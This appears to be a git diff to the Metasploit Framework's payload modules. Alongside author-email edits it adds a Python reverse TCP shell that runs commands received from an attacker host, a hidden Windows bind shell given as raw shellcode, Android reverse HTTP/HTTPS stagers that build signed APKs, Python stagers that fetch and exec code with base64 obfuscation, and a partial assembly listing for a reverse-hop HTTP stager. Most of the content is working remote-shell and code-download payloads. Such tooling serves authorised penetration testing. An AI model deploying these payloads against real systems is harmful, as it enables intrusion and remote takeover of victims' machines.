       'Description'   => 'Listen for a connection and spawn a command shell via perl (persistent) over IPv6',
-      'Author'        => ['Samy <samy@samy.pl>', 'cazz'],
+      'Author'        => ['Samy <samy[at]samy.pl>', 'cazz'],
       'License'       => BSD_LICENSE,
       'Platform'      => 'php',
       'Arch'          => ARCH_PHP,
diff --git a/modules/payloads/singles/php/bind_php.rb b/modules/payloads/singles/php/bind_php.rb
index 0887f27d5d..657c55e70b 100644
--- a/modules/payloads/singles/php/bind_php.rb
+++ b/modules/payloads/singles/php/bind_php.rb
@@ -19,7 +19,7 @@ module Metasploit3
     super(merge_info(info,
       'Name'          => 'PHP Command Shell, Bind TCP (via PHP)',
       'Description'   => 'Listen for a connection and spawn a command shell via php',
-      'Author'        => ['egypt', 'diaul <diaul@devilopers.org>',],
+      'Author'        => ['egypt', 'diaul <diaul[at]devilopers.org>',],
       'License'       => BSD_LICENSE,
       'Platform'      => 'php',
       'Arch'          => ARCH_PHP,
diff --git a/modules/payloads/singles/php/bind_php_ipv6.rb b/modules/payloads/singles/php/bind_php_ipv6.rb
index 5f268896ac..c9717b9399 100644
--- a/modules/payloads/singles/php/bind_php_ipv6.rb
+++ b/modules/payloads/singles/php/bind_php_ipv6.rb
@@ -19,7 +19,7 @@ module Metasploit3
     super(merge_info(info,
       'Name'          => 'PHP Command Shell, Bind TCP (via php) IPv6',
       'Description'   => 'Listen for a connection and spawn a command shell via php (IPv6)',
-      'Author'        => ['egypt', 'diaul <diaul@devilopers.org>',],
+      'Author'        => ['egypt', 'diaul <diaul[at]devilopers.org>',],
       'License'       => BSD_LICENSE,
       'Platform'      => 'php',
       'Arch'          => ARCH_PHP,
diff --git a/modules/payloads/singles/php/shell_findsock.rb b/modules/payloads/singles/php/shell_findsock.rb
index 0c86dc7f1a..a37bb7cbb4 100644
--- a/modules/payloads/singles/php/shell_findsock.rb
+++ b/modules/payloads/singles/php/shell_findsock.rb
@@ -33,7 +33,7 @@ module Metasploit3
         Apache but it might work on other web servers
         that leak file descriptors to child processes.
         },
-      'Author'        => [ 'egypt <egypt@metasploit.com>' ],
+      'Author'        => [ 'egypt' ],
       'License'       => BSD_LICENSE,
       'Platform'      => 'php',
       'Handler'       => Msf::Handler::FindShell,
diff --git a/modules/payloads/singles/python/shell_reverse_tcp.rb b/modules/payloads/singles/python/shell_reverse_tcp.rb
new file mode 100644
index 0000000000..1527ad9a26
--- /dev/null
+++ b/modules/payloads/singles/python/shell_reverse_tcp.rb
@@ -0,0 +1,68 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'msf/core/handler/reverse_tcp'
+require 'msf/base/sessions/command_shell'
+require 'msf/base/sessions/command_shell_options'
+
+module Metasploit3
+
+  include Msf::Payload::Single
+  include Msf::Sessions::CommandShellOptions
+
+  def initialize(info = {})
+    super(merge_info(info,
+      'Name'          => 'Command Shell, Reverse TCP (via python)',
+      'Description'   => 'Creates an interactive shell via python, encodes with base64 by design. Compatible with Python 2.3.3',
+      'Author'        => 'Ben Campbell', # Based on RageLtMan's reverse_ssl
+      'License'       => MSF_LICENSE,
+      'Platform'      => 'python',
+      'Arch'          => ARCH_PYTHON,
+      'Handler'       => Msf::Handler::ReverseTcp,
+      'Session'       => Msf::Sessions::CommandShell,
+      'PayloadType'   => 'python',
+      'Payload'       =>
+        {
+          'Offsets' => { },
+          'Payload' => ''
+        }
+      ))
+  end
+
+  #
+  # Constructs the payload
+  #
+  def generate
+    super + command_string
+  end
+
+  #
+  # Returns the command string to use for execution
+  #
+  def command_string
+    cmd = ''
+    dead = Rex::Text.rand_text_alpha(2)
+    # Set up the socket
+    cmd << "import socket,os\n"
+    cmd << "so=socket.socket(socket.AF_INET,socket.SOCK_STREAM)\n"
+    cmd << "so.connect(('#{datastore['LHOST']}',#{ datastore['LPORT']}))\n"
+    # The actual IO
+    cmd << "#{dead}=False\n"
+    cmd << "while not #{dead}:\n"
+    cmd << "\tdata=so.recv(1024)\n"
+    cmd << "\tif len(data)==0:\n\t\t#{dead}=True\n"
+    cmd << "\tstdin,stdout,stderr,=os.popen3(data)\n"
+    cmd << "\tstdout_value=stdout.read()+stderr.read()\n"
+    cmd << "\tso.send(stdout_value)\n"
+
+    # Base64 encoding is required in order to handle Python's formatting requirements in the while loop
+    cmd = "exec('#{Rex::Text.encode_base64(cmd)}'.decode('base64'))"
+
+    cmd
+  end
+
+end
+
diff --git a/modules/payloads/singles/python/shell_reverse_tcp_ssl.rb b/modules/payloads/singles/python/shell_reverse_tcp_ssl.rb
index 7601be09ea..652d094a5c 100644
--- a/modules/payloads/singles/python/shell_reverse_tcp_ssl.rb
+++ b/modules/payloads/singles/python/shell_reverse_tcp_ssl.rb
@@ -15,12 +15,12 @@ module Metasploit3
 
   def initialize(info = {})
     super(merge_info(info,
-      'Name'          => 'Unix Command Shell, Reverse TCP SSL (via python)',
+      'Name'          => 'Command Shell, Reverse TCP SSL (via python)',
       'Description'   => 'Creates an interactive shell via python, uses SSL, encodes with base64 by design.',
       'Author'        => 'RageLtMan',
       'License'       => BSD_LICENSE,
       'Platform'      => 'python',
-      'Arch'          => ARCH_CMD,
+      'Arch'          => ARCH_PYTHON,
       'Handler'       => Msf::Handler::ReverseTcpSsl,
       'Session'       => Msf::Sessions::CommandShell,
       'PayloadType'   => 'python',
@@ -36,8 +36,7 @@ module Metasploit3
   # Constructs the payload
   #
   def generate
-    vprint_good(command_string)
-    return super + command_string
+    super + command_string
   end
 
   #
@@ -60,11 +59,10 @@ module Metasploit3
     cmd += "\tstdout_value=proc.stdout.read() + proc.stderr.read()\n"
     cmd += "\ts.send(stdout_value)\n"
 
-    # The *nix shell wrapper to keep things clean
     # Base64 encoding is required in order to handle Python's formatting requirements in the while loop
     cmd = "exec('#{Rex::Text.encode_base64(cmd)}'.decode('base64'))"
-    return cmd
 
+    cmd
   end
-
 end
+
diff --git a/modules/payloads/singles/windows/shell_bind_tcp_xpfw.rb b/modules/payloads/singles/windows/shell_bind_tcp_xpfw.rb
index a05617a8ad..af16d96ae0 100644
--- a/modules/payloads/singles/windows/shell_bind_tcp_xpfw.rb
+++ b/modules/payloads/singles/windows/shell_bind_tcp_xpfw.rb
@@ -18,7 +18,7 @@ module Metasploit3
     super(merge_info(info,
       'Name'          => 'Windows Disable Windows ICF, Command Shell, Bind TCP Inline',
       'Description'   => 'Disable the Windows ICF, then listen for a connection and spawn a command shell',
-      'Author'        => 'Lin0xx <lin0xx [at] metasploit.com>',
+      'Author'        => 'Lin0xx <lin0xx[at]metasploit.com>',
       'License'       => MSF_LICENSE,
       'Platform'      => 'win',
       'Arch'          => ARCH_X86,
diff --git a/modules/payloads/singles/windows/shell_hidden_bind_tcp.rb b/modules/payloads/singles/windows/shell_hidden_bind_tcp.rb
new file mode 100644
index 0000000000..d768feaa1b
--- /dev/null
+++ b/modules/payloads/singles/windows/shell_hidden_bind_tcp.rb
@@ -0,0 +1,79 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'msf/core/handler/bind_tcp'
+require 'msf/base/sessions/command_shell'
+require 'msf/base/sessions/command_shell_options'
+
+module Metasploit3
+
+  include Msf::Payload::Windows
+  include Msf::Payload::Single
+  include Msf::Sessions::CommandShellOptions
+
+  def initialize(info = {})
+    super(merge_info(info,
+      'Name'          => 'Windows Command Shell, Hidden Bind TCP Inline',
+      'Description'   => 'Listen for a connection from certain IP and spawn a command shell.
+                          The shellcode will reply with a RST packet if the connections is not
+                          comming from the IP defined in AHOST. This way the port will appear
+                          as "closed" helping us to hide the shellcode.',
+      'Author'        =>
+        [
+          'vlad902',    # original payload module (single_shell_bind_tcp)
+          'sd',         # original payload module (single_shell_bind_tcp)
+          'Borja Merino <bmerinofe[at]gmail.com>' # Add Hidden ACL functionality
+        ],
+      'License'       => MSF_LICENSE,
+      'References'    => ['URL', 'http://www.shelliscoming.com/2014/03/hidden-bind-shell-keep-your-shellcode.html'],
+      'Platform'      => 'win',
+      'Arch'          => ARCH_X86,
+      'Handler'       => Msf::Handler::BindTcp,
+      'Session'       => Msf::Sessions::CommandShell,
+      'Payload'       =>
+        {
+          'Offsets' =>
+            {
+              'LPORT'    => [ 200, 'n' ],
+              'AHOST'    => [ 262, 'ADDR' ],
+              'EXITFUNC' => [ 363, 'V' ],
+            },
+          'Payload' =>
+      "\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30\x8b" +
+      "\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\x31\xc0" +
+      "\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf0\x52\x57" +
+      "\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85\xc0\x74\x4a\x01" +
+      "\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b" +
+      "\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4" +
+      "\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b" +
+      "\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24" +
+      "\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d" +
+      "\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07" +
+      "\xff\xd5\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00" +
+      "\xff\xd5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff" +
+      "\xd5\x97\x31\xdb\x53\x68\x02\x00\x11\x5c\x89\xe6\x6a\x10\x56\x57" +
+      "\x68\xc2\xdb\x37\x67\xff\xd5\x6a\x01\x54\x68\x02\x30\x00\x00\x68" +
+      "\xff\xff\x00\x00\x57\x68\xf1\xa2\x77\x29\xff\xd5\x53\x57\x68\xb7" +
+      "\xe9\x38\xff\xff\xd5\x53\xe8\x17\x00\x00\x00\x8b\x44\x24\x04\x8b" +
+      "\x40\x04\x8b\x40\x04\x2d\xc0\xa8\x01\x21\x74\x03\x31\xc0\x40\xc2" +
+      "\x20\x00\x53\x53\x57\x68\x94\xac\xbe\x33\xff\xd5\x40\x74\xd6\x48" +
+      "\x57\x97\x68\x75\x6e\x4d\x61\xff\xd5\x68\x63\x6d\x64\x00\x89\xe3" +
+      "\x57\x57\x57\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66\xc7\x44\x24\x3c" +
+      "\x01\x01\x8d\x44\x24\x10\xc6\x00\x44\x54\x50\x56\x56\x56\x46\x56" +
+      "\x4e\x56\x56\x53\x56\x68\x79\xcc\x3f\x86\xff\xd5\x89\xe0\x4e\x56" +
+      "\x46\xff\x30\x68\x08\x87\x1d\x60\xff\xd5\xbb\xe0\x1d\x2a\x0a\x68" +
+      "\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb" +
+      "\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5"
+        }
+      ))
+
+    register_options([
+      OptAddress.new('AHOST', [true, "IP address allowed", nil])
+    ])
+  end
+
+end
+
diff --git a/modules/payloads/stagers/android/reverse_http.rb b/modules/payloads/stagers/android/reverse_http.rb
new file mode 100644
index 0000000000..b552686343
--- /dev/null
+++ b/modules/payloads/stagers/android/reverse_http.rb
@@ -0,0 +1,58 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'msf/core/handler/reverse_http'
+
+module Metasploit3
+
+  include Msf::Payload::Stager
+  include Msf::Payload::Dalvik
+
+  def initialize(info = {})
+    super(merge_info(info,
+      'Name'          => 'Dalvik Reverse HTTP Stager',
+      'Description'   => 'Tunnel communication over HTTP',
+      'Author'        => 'anwarelmakrahy',
+      'License'       => MSF_LICENSE,
+      'Platform'      => 'android',
+      'Arch'          => ARCH_DALVIK,
+      'Handler'       => Msf::Handler::ReverseHttp,
+      'Stager'        => {'Payload' => ""}
+      ))
+
+    register_options(
+    [
+      OptInt.new('RetryCount', [true, "Number of trials to be made if connection failed", 10])
+    ], self.class)
+  end
+
+  def generate_jar(opts={})
+    host = datastore['LHOST'] ? datastore['LHOST'].to_s : String.new
+    port = datastore['LPORT'] ? datastore['LPORT'].to_s : 8443.to_s
+    raise ArgumentError, "LHOST can be 32 bytes long at the most" if host.length + port.length + 1 > 32
+
+    jar = Rex::Zip::Jar.new
+
+    classes = File.read(File.join(Msf::Config::InstallRoot, 'data', 'android', 'apk', 'classes.dex'), {:mode => 'rb'})
+    string_sub(classes, 'ZZZZ                                ', "ZZZZhttp://" + host + ":" + port)
+    string_sub(classes, 'TTTT                                ', "TTTT" + datastore['RetryCount'].to_s) if datastore['RetryCount']
+    jar.add_file("classes.dex", fix_dex_header(classes))
+
+    files = [
+      [ "AndroidManifest.xml" ],
+      [ "resources.arsc" ]
+    ]
+
+    jar.add_files(files, File.join(Msf::Config.install_root, "data", "android", "apk"))
+    jar.build_manifest
+
+    cert, key = generate_cert
+    jar.sign(key, cert, [cert])
+
+    jar
+  end
+
+end
diff --git a/modules/payloads/stagers/android/reverse_https.rb b/modules/payloads/stagers/android/reverse_https.rb
new file mode 100644
index 0000000000..a9496ebdf2
--- /dev/null
+++ b/modules/payloads/stagers/android/reverse_https.rb
@@ -0,0 +1,57 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'msf/core/handler/reverse_https'
+
+module Metasploit3
+
+  include Msf::Payload::Stager
+  include Msf::Payload::Dalvik
+
+  def initialize(info = {})
+    super(merge_info(info,
+      'Name'          => 'Dalvik Reverse HTTPS Stager',
+      'Description'   => 'Tunnel communication over HTTPS',
+      'Author'        => 'anwarelmakrahy',
+      'License'       => MSF_LICENSE,
+      'Platform'      => 'android',
+      'Arch'          => ARCH_DALVIK,
+      'Handler'       => Msf::Handler::ReverseHttps,
+      'Stager'        => {'Payload' => ""}
+    ))
+
+    register_options(
+    [
+      OptInt.new('RetryCount', [true, "Number of trials to be made if connection failed", 10])
+    ], self.class)
+  end
+
+  def generate_jar(opts={})
+    host = datastore['LHOST'] ? datastore['LHOST'].to_s : String.new
+    port = datastore['LPORT'] ? datastore['LPORT'].to_s : 8443.to_s
+    raise ArgumentError, "LHOST can be 32 bytes long at the most" if host.length + port.length + 1 > 32
+
+    jar = Rex::Zip::Jar.new
+
+    classes = File.read(File.join(Msf::Config::InstallRoot, 'data', 'android', 'apk', 'classes.dex'), {:mode => 'rb'})
+    string_sub(classes, 'ZZZZ                                ', "ZZZZhttps://" + host + ":" + port)
+    string_sub(classes, 'TTTT                                ', "TTTT" + datastore['RetryCount'].to_s) if datastore['RetryCount']
+    jar.add_file("classes.dex", fix_dex_header(classes))
+
+    files = [
+      [ "AndroidManifest.xml" ],
+      [ "resources.arsc" ]
+    ]
+
+    jar.add_files(files, File.join(Msf::Config.install_root, "data", "android", "apk"))
+    jar.build_manifest
+
+    cert, key = generate_cert
+    jar.sign(key, cert, [cert])
+
+    jar
+  end
+end
diff --git a/modules/payloads/stagers/android/reverse_tcp.rb b/modules/payloads/stagers/android/reverse_tcp.rb
index d41922f40e..c4d263f72e 100644
--- a/modules/payloads/stagers/android/reverse_tcp.rb
+++ b/modules/payloads/stagers/android/reverse_tcp.rb
@@ -24,10 +24,11 @@ module Metasploit3
       'Handler'		=> Msf::Handler::ReverseTcp,
       'Stager'		=> {'Payload' => ""}
     ))
-  end
 
-  def string_sub(data, placeholder, input)
-    data.gsub!(placeholder, input + ' ' * (placeholder.length - input.length))
+    register_options(
+    [
+      OptInt.new('RetryCount', [true, "Number of trials to be made if connection failed", 10])
+    ], self.class)
   end
 
   def generate_jar(opts={})
@@ -35,46 +36,20 @@ module Metasploit3
 
     classes = File.read(File.join(Msf::Config::InstallRoot, 'data', 'android', 'apk', 'classes.dex'), {:mode => 'rb'})
 
-    string_sub(classes, '127.0.0.1                       ', datastore['LHOST'].to_s) if datastore['LHOST']
-    string_sub(classes, '4444                            ', datastore['LPORT'].to_s) if datastore['LPORT']
+    string_sub(classes, 'XXXX127.0.0.1                       ', "XXXX" + datastore['LHOST'].to_s) if datastore['LHOST']
+    string_sub(classes, 'YYYY4444                            ', "YYYY" + datastore['LPORT'].to_s) if datastore['LPORT']
+    string_sub(classes, 'TTTT                                ', "TTTT" + datastore['RetryCount'].to_s) if datastore['RetryCount']
     jar.add_file("classes.dex", fix_dex_header(classes))
 
     files = [
       [ "AndroidManifest.xml" ],
-      [ "res", "drawable-mdpi", "icon.png" ],
-      [ "res", "layout", "main.xml" ],
       [ "resources.arsc" ]
     ]
 
     jar.add_files(files, File.join(Msf::Config.data_directory, "android", "apk"))
     jar.build_manifest
 
-    x509_name = OpenSSL::X509::Name.parse(
-      "C=Unknown/ST=Unknown/L=Unknown/O=Unknown/OU=Unknown/CN=Unknown"
-      )
-    key  = OpenSSL::PKey::RSA.new(1024)
-    cert = OpenSSL::X509::Certificate.new
-    cert.version = 2
-    cert.serial = 1
-    cert.subject = x509_name
-    cert.issuer = x509_name
-    cert.public_key = key.public_key
-
-    # Some time within the last 3 years
-    cert.not_before = Time.now - rand(3600*24*365*3)
-
-    # From http://developer.android.com/tools/publishing/app-signing.html
-    # """
-    # A validity period of more than 25 years is recommended.
-    #
-    # If you plan to publish your application(s) on Google Play, note
-    # that a validity period ending after 22 October 2033 is a
-    # requirement. You can not upload an application if it is signed
-    # with a key whose validity expires before that date.
-    # """
-    # The timestamp 0x78045d81 equates to 2033-10-22 00:00:01 UTC
-    cert.not_after = Time.at( 0x78045d81  + rand( 0x7fffffff - 0x78045d81 ))
-
+    cert, key = generate_cert
     jar.sign(key, cert, [cert])
 
     jar
diff --git a/modules/payloads/stagers/python/bind_tcp.rb b/modules/payloads/stagers/python/bind_tcp.rb
index cd9422023c..60753157c1 100644
--- a/modules/payloads/stagers/python/bind_tcp.rb
+++ b/modules/payloads/stagers/python/bind_tcp.rb
@@ -15,36 +15,38 @@ module Metasploit3
   def initialize(info = {})
     super(merge_info(info,
       'Name'          => 'Python Bind TCP Stager',
-      'Description'   => 'Python connect stager',
+      'Description'   => 'Listen for a connection',
       'Author'        => 'Spencer McIntyre',
       'License'       => MSF_LICENSE,
       'Platform'      => 'python',
       'Arch'          => ARCH_PYTHON,
       'Handler'       => Msf::Handler::BindTcp,
       'Stager'        => {'Payload' => ""}
-      ))
+    ))
   end
 
   #
   # Constructs the payload
   #
   def generate
-    cmd = ''
     # Set up the socket
-    cmd += "import socket,struct\n"
-    cmd += "s=socket.socket(2,1)\n" # socket.AF_INET = 2, socket.SOCK_STREAM = 1
-    cmd += "s.bind(('#{ datastore['LHOST'] }',#{ datastore['LPORT'] }))\n"
-    cmd += "s.listen(1)\n"
-    cmd += "c,a=s.accept()\n"
-    cmd += "l=struct.unpack('>I',c.recv(4))[0]\n"
-    cmd += "d=c.recv(4096)\n"
-    cmd += "while len(d)!=l:\n"
-    cmd += "\td+=c.recv(4096)\n"
-    cmd += "exec(d,{'s':c})\n"
+    cmd  = "import socket,struct\n"
+    cmd << "s=socket.socket(2,socket.SOCK_STREAM)\n" # socket.AF_INET = 2
+    cmd << "s.bind(('#{ datastore['LHOST'] }',#{ datastore['LPORT'] }))\n"
+    cmd << "s.listen(1)\n"
+    cmd << "c,a=s.accept()\n"
+    cmd << "l=struct.unpack('>I',c.recv(4))[0]\n"
+    cmd << "d=c.recv(4096)\n"
+    cmd << "while len(d)!=l:\n"
+    cmd << "\td+=c.recv(4096)\n"
+    cmd << "exec(d,{'s':c})\n"
 
     # Base64 encoding is required in order to handle Python's formatting requirements in the while loop
-    cmd = "import base64; exec(base64.b64decode('#{Rex::Text.encode_base64(cmd)}'))"
-    return cmd
+    b64_stub  = "import base64,sys;exec(base64.b64decode("
+    b64_stub << "{2:str,3:lambda b:bytes(b,'UTF-8')}[sys.version_info[0]]('"
+    b64_stub << Rex::Text.encode_base64(cmd)
+    b64_stub << "')))"
+    return b64_stub
   end
 
   def handle_intermediate_stage(conn, payload)
diff --git a/modules/payloads/stagers/python/reverse_tcp.rb b/modules/payloads/stagers/python/reverse_tcp.rb
index 765dc00f34..bbf7891414 100644
--- a/modules/payloads/stagers/python/reverse_tcp.rb
+++ b/modules/payloads/stagers/python/reverse_tcp.rb
@@ -15,34 +15,36 @@ module Metasploit3
   def initialize(info = {})
     super(merge_info(info,
       'Name'          => 'Python Reverse TCP Stager',
-      'Description'   => 'Reverse Python connect back stager',
+      'Description'   => 'Connect back to the attacker',
       'Author'        => 'Spencer McIntyre',
       'License'       => MSF_LICENSE,
       'Platform'      => 'python',
       'Arch'          => ARCH_PYTHON,
       'Handler'       => Msf::Handler::ReverseTcp,
       'Stager'        => {'Payload' => ""}
-      ))
+    ))
   end
 
   #
   # Constructs the payload
   #
   def generate
-    cmd = ''
     # Set up the socket
-    cmd += "import socket,struct\n"
-    cmd += "s=socket.socket(2,1)\n" # socket.AF_INET = 2, socket.SOCK_STREAM = 1
-    cmd += "s.connect(('#{ datastore['LHOST'] }',#{ datastore['LPORT'] }))\n"
-    cmd += "l=struct.unpack('>I',s.recv(4))[0]\n"
-    cmd += "d=s.recv(4096)\n"
-    cmd += "while len(d)!=l:\n"
-    cmd += "\td+=s.recv(4096)\n"
-    cmd += "exec(d,{'s':s})\n"
+    cmd  = "import socket,struct\n"
+    cmd << "s=socket.socket(2,socket.SOCK_STREAM)\n" # socket.AF_INET = 2
+    cmd << "s.connect(('#{ datastore['LHOST'] }',#{ datastore['LPORT'] }))\n"
+    cmd << "l=struct.unpack('>I',s.recv(4))[0]\n"
+    cmd << "d=s.recv(4096)\n"
+    cmd << "while len(d)!=l:\n"
+    cmd << "\td+=s.recv(4096)\n"
+    cmd << "exec(d,{'s':s})\n"
 
     # Base64 encoding is required in order to handle Python's formatting requirements in the while loop
-    cmd = "import base64; exec(base64.b64decode('#{Rex::Text.encode_base64(cmd)}'))"
-    return cmd
+    b64_stub  = "import base64,sys;exec(base64.b64decode("
+    b64_stub << "{2:str,3:lambda b:bytes(b,'UTF-8')}[sys.version_info[0]]('"
+    b64_stub << Rex::Text.encode_base64(cmd)
+    b64_stub << "')))"
+    return b64_stub
   end
 
   def handle_intermediate_stage(conn, payload)
diff --git a/modules/payloads/stagers/windows/reverse_hop_http.rb b/modules/payloads/stagers/windows/reverse_hop_http.rb
new file mode 100644
index 0000000000..66632ca9f8
--- /dev/null
+++ b/modules/payloads/stagers/windows/reverse_hop_http.rb
@@ -0,0 +1,291 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'uri'
+require 'msf/core'
+require 'msf/core/handler/reverse_hop_http'
+
+module Metasploit3
+
+  include Msf::Payload::Stager
+  include Msf::Payload::Windows
+
+  def initialize(info = {})
+    super(merge_info(info,
+      'Name'          => 'Reverse Hop HTTP Stager',
+      'Description'   => %q{ Tunnel communication over an HTTP hop point. Note that you must first upload
+        data/hop/hop.php to the PHP server you wish to use as a hop.
+      },
+      'Author'        =>
+        [
+         'scriptjunkie <scriptjunkie[at]scriptjunkie.us>',
+         'hdm'
+        ],
+      'License'       => MSF_LICENSE,
+      'Platform'      => 'win',
+      'Arch'          => ARCH_X86,
+      'Handler'       => Msf::Handler::ReverseHopHttp,
+      'Convention'    => 'sockedi http',
+      'DefaultOptions' => { 'WfsDelay' => 30 },
+      'Stager'        =>
+        {
+          'Offsets' =>
+            {
+              # None, they get embedded in the shellcode
+            }
+        }
+      ))
+
+    deregister_options('LHOST', 'LPORT')
+
+    register_options([
+      OptString.new('HOPURL', [ true, "The full URL of the hop script", "http://example.com/hop.php" ]
+      )
+    ], self.class)
+  end
+
+  #
+  # Do not transmit the stage over the connection.  We handle this via HTTP
+  #
+  def stage_over_connection?
+    false
+  end
+
+  #
+  # Generate the first stage
+  #
+  def generate
+    uri = URI(datastore['HOPURL'])
+    #create actual payload
+    payload_data = <<EOS
+  cld            ; clear direction flag
+  call start        ; start main routine
+; Stephen Fewer's block_api
+; block_api code (Stephen Fewer)
+api_call:
+  pushad                 ; We preserve all the registers for the caller, bar EAX and ECX.
+  mov ebp, esp           ; Create a new stack frame
+  xor edx, edx           ; Zero EDX
+  mov edx, fs:[edx+48]   ; Get a pointer to the PEB
+  mov edx, [edx+12]      ; Get PEB->Ldr
+  mov edx, [edx+20]      ; Get the first module from the InMemoryOrder module list
+next_mod:
+  mov esi, [edx+40]      ; Get pointer to modules name (unicode string)
+  movzx ecx, word [edx+38] ; Set ECX to the length we want to check
+  xor edi, edi           ; Clear EDI which will store the hash of the module name
+loop_modname:            ;
+  xor eax, eax           ; Clear EAX
+  lodsb                  ; Read in the next byte of the name
+  cmp al, 'a'            ; Some versions of Windows use lower case module names
+  jl not_lowercase       ;
+  sub al, 0x20           ; If so normalise to uppercase
+not_lowercase:           ;
+  ror edi, 13            ; Rotate right our hash value
+  add edi, eax           ; Add the next byte of the name
+  loop loop_modname      ; Loop until we have read enough
+  ; We now have the module hash computed
+  push edx               ; Save the current position in the module list for later
+  push edi               ; Save the current module hash for later
+  ; Proceed to iterate the export address table,
+  mov edx, [edx+16]      ; Get this modules base address
+  mov eax, [edx+60]      ; Get PE header
+  add eax, edx           ; Add the modules base address
+  mov eax, [eax+120]     ; Get export tables RVA
+  test eax, eax          ; Test if no export address table is present
+  jz get_next_mod1       ; If no EAT present, process the next module
+  add eax, edx           ; Add the modules base address
+  push eax               ; Save the current modules EAT
+  mov ecx, [eax+24]      ; Get the number of function names
+  mov ebx, [eax+32]      ; Get the rva of the function names
+  add ebx, edx           ; Add the modules base address
+  ; Computing the module hash + function hash
+get_next_func:           ;
+  jecxz get_next_mod     ; When we reach the start of the EAT (we search backwards) process next mod
+  dec ecx                ; Decrement the function name counter
+  mov esi, [ebx+ecx*4]   ; Get rva of next module name
+  add esi, edx           ; Add the modules base address
+  xor edi, edi           ; Clear EDI which will store the hash of the function name
+  ; And compare it to the one we want
+loop_funcname:           ;
+  xor eax, eax           ; Clear EAX
+  lodsb                  ; Read in the next byte of the ASCII function name
+  ror edi, 13            ; Rotate right our hash value
+  add edi, eax           ; Add the next byte of the name
+  cmp al, ah             ; Compare AL (the next byte from the name) to AH (null)
+  jne loop_funcname      ; If we have not reached the null terminator, continue
+  add edi, [ebp-8]       ; Add the current module hash to the function hash
+  cmp edi, [ebp+36]      ; Compare the hash to the one we are searchnig for
+  jnz get_next_func      ; Go compute the next function hash if we have not found it
+  ; If found, fix up stack, call the function and then value else compute the next one...
+  pop eax                ; Restore the current modules EAT
+  mov ebx, [eax+36]      ; Get the ordinal table rva
+  add ebx, edx           ; Add the modules base address
+  mov cx, [ebx+2*ecx]    ; Get the desired functions ordinal
+  mov ebx, [eax+28]      ; Get the function addresses table rva
+  add ebx, edx           ; Add the modules base address
+  mov eax, [ebx+4*ecx]   ; Get the desired functions RVA
+  add eax, edx           ; Add the modules base address to get the functions actual VA
+  ; We now fix up the stack and perform the call to the desired function...
+finish:
+  mov [esp+36], eax      ; Overwrite the old EAX value with the desired api address
+  pop ebx                ; Clear off the current modules hash
+  pop ebx                ; Clear off the current position in the module list
+  popad                  ; Restore all of the callers registers, bar EAX, ECX and EDX
+  pop ecx                ; Pop off the origional return address our caller will have pushed
+  pop edx                ; Pop off the hash value our caller will have pushed
+  push ecx               ; Push back the correct return value
+  jmp eax                ; Jump into the required function
+  ; We now automagically return to the correct caller...
+get_next_mod:            ;
+  pop eax                ; Pop off the current (now the previous) modules EAT
+get_next_mod1:           ;
+  pop edi                ; Pop off the current (now the previous) modules hash
+  pop edx                ; Restore our position in the module list
+  mov edx, [edx]         ; Get the next module
+  jmp.i8 next_mod        ; Process this module
+
+; actual routine
+start:
+  pop ebp            ; get ptr to block_api routine
+
+; Input: EBP must be the address of 'api_call'.
+; Output: EDI will be the socket for the connection to the server
+; Clobbers: EAX, ESI, EDI, ESP will also be modified (-0x1A0)
+load_wininet:
+  push 0x0074656e        ; Push the bytes 'wininet',0 onto the stack.
+  push 0x696e6977        ; ...
+  push esp               ; Push a pointer to the "wininet" string on the stack.
+  push 0x0726774C        ; hash( "kernel32.dll", "LoadLibraryA" )
+  call ebp               ; LoadLibraryA( "wininet" )
+
+internetopen:
+  xor edi,edi
+  push edi               ; DWORD dwFlags
+  push edi               ; LPCTSTR lpszProxyBypass
+  push edi               ; LPCTSTR lpszProxyName
+  push edi               ; DWORD dwAccessType (PRECONFIG = 0)
+  push 0                 ; NULL pointer
+  push esp               ; LPCTSTR lpszAgent ("\x00")
+  push 0xA779563A        ; hash( "wininet.dll", "InternetOpenA" )
+  call ebp
+
+  jmp.i8 dbl_get_server_host
+
+internetconnect:
+  pop ebx                ; Save the hostname pointer
+  xor ecx, ecx
+  push ecx               ; DWORD_PTR dwContext (NULL)
+  push ecx               ; dwFlags
+  push 3                 ; DWORD dwService (INTERNET_SERVICE_HTTP)
+  push ecx               ; password
+  push ecx               ; username
+  push #{uri.port} ; PORT
+  push ebx               ; HOSTNAME
+  push eax               ; HINTERNET hInternet
+  push 0xC69F8957        ; hash( "wininet.dll", "InternetConnectA" )
+  call ebp
+
+  jmp get_server_uri
+
+httpopenrequest:
+  pop ecx
+  xor edx, edx           ; NULL
+  push edx               ; dwContext (NULL)
